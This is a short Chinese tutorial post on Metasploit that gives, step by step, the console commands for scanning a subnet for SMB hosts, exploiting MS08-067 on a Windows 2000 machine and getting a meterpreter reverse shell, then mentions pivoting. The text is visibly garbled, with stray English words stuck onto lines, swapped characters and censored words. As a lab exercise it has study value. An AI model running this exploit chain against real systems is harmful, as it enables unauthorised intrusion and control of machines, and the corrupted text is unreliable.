Metasploit學習1

控制檯是較爲方便的操做接口,所以在命令行下輸入msfconsole命令進入控制檯windows

考慮到ms08-067是比較廣泛也是較容易上手的安全漏洞,所以拿它做練習api

首先進行掃描,肯定開放samba服務的主機安全

加載掃描模塊,use scanner/smb/versiontcp

設定掃描範圍,set rhosts 192.168.11.0/24ide

查找到192.168.11.2,操做系統爲windows 2000 操作系統

查詢相關資料,該版本存在ms08-067漏洞命令行

在控制檯中輸入search ms08_067,查詢目前加載的全部安全漏洞***模塊,接口

每一個模塊,根據***成功的可能性,有評價it

加載選定的***模塊,use windows/smb/ms08_067_netapiio

輸入show options,查看模塊涉及的參數

設定目標主機的地址,set rhost 192.168.11.2

查詢與***模塊有關的***代碼,search payload

一旦漏洞***成功,經過***代碼取得控制權或進行破壞

設定選定的***代碼,set payload windows/meterpreter/reverse_tcp

再次輸入show options,查看***代碼的相關參數

設定***主機的地址,set lhost 192.168.11.10 ,以便於傳回鏈接

輸入exploit發起***

可能一次不能取得成功,能夠多試幾回

成功後,返回meterpreter控制檯,取得對目標主機的控制權

控制檯提供了系統命令,能夠用於跳板***。

相關文章
相關標籤/搜索